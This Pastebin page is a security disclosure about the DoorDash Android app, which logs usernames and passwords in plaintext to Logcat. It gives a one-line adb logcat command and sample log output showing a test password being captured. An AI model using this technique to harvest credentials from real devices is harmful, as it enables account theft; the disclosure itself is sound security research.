friendlyjlee

Security Problem in DoorDash Android App

Oct 7th, 2019
4,300
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: DoorDash Android App - Username/Password Logging
  2. # Application: DoorDash
  3. # Version: 11.0.2 ~ 11.5.2 (all versions we tested have this problem)
  4. # Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
  5. # Company: DoorDash
  6. # Installs: 10,000,000+ (#1 in food category in Google Play)
  7. # Impact: Looking at the output of Logcat, hackers can get username and password of DoorDash
  8. # Category: Mobile Apps
  9. # Tested on: Android 9
  10.  
  11. ---Description---
  12. Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of DoorDash, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
  13.  
  14. ---Vendor feedback---
  15. We have reported this issue, and they will fix it soon.
  16.  
  17. ---PoC---
  18. 1. Try to log in DoorDash Android app, Android app.
  19. - Opening Login UI
  20. - Enter credentials. Fake information is enough for reproducing.
  21.  
  22. 2. Search password in Logcat
  23. $ adb logcat | grep 'OkHttp'
  24.  
  25. 10-07 16:09:34.498 10066 10201 D OkHttp : --> POST https://api.doordash.com/v2/auth/token/
  26. 10-07 16:09:34.498 10066 10201 D OkHttp : Content-Type: application/json; charset=UTF-8
  27. 10-07 16:09:34.498 10066 10201 D OkHttp : Content-Length: 109
  28. 10-07 16:09:34.498 10066 10201 D OkHttp : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
  29. 10-07 16:09:34.498 10066 10201 D OkHttp : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
  30. 10-07 16:09:34.498 10066 10201 D OkHttp : --> END POST (109-byte body)
  31.  
  32.  
  33. ---Reporter---
  34. Jaeho Lee(Jaeho.Lee@rice.edu)
  35. Rice Computer Security Lab
  36. Rice University
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×